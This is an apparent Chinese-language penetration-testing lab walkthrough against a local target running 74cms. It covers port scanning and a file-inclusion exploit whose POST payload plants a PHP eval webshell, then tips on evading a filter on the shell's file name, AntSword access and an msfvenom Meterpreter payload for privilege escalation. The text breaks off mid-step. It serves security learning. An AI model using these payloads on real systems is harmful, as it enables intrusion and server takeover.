部署环境
此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。
信息收集
扫描主机
扫描同一网段中的存活主机
发现存活主机ip地址(其他ip是我其他机器的ip地址)
192.168.1.17
扫描端口
扫描一下存活靶机的ip地址
nmap -A -p- 192.168.1.17
发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看
访问80端口发现不可
web渗透
访问81端口
在这里发现了一个骑士的cms框架界面
看到底下的版本信息,搜索一下看看这个版本有没有什么版本漏洞进行利用
直接搜索这个版本漏洞
发现实存在文件包含漏洞的,那就直接利用这个漏洞进行渗透即可
查看http://192.168.1.17:81/,通过搜集信息可知,可能存在74cms文件包含漏洞:
然后继续执行:
http://192.168.1.17:81/index.php?m=home&a=assign_resume_tpl
post执行
variable=1&tpl=<?php fputs(fopen("tx.php","w"),"<?php eval($_POST[123123]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名=“info” 企业id="$_GET[‘id’]"/>
开始包含
http://192.168.1.17:81/index.php?m=home&a=assign_resume_tpl
post部分(注意包含的时候,要对应日期)
variable=1&tpl=data/Runtime/Logs/Home/22_03_30.log
在这里要切记 “shell.php会被被拦截,要避免!”
然后就直接上蚁剑链接就行
已经成功链接
Ubuntu提权
首先先上线MSF,生成一个木马文件,好给Ubuntu虚拟机传上
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf >0330.elf
通过蚁剑上传上去之后,赋予执行权限,运行:
同时在攻击机开启msf进行连接: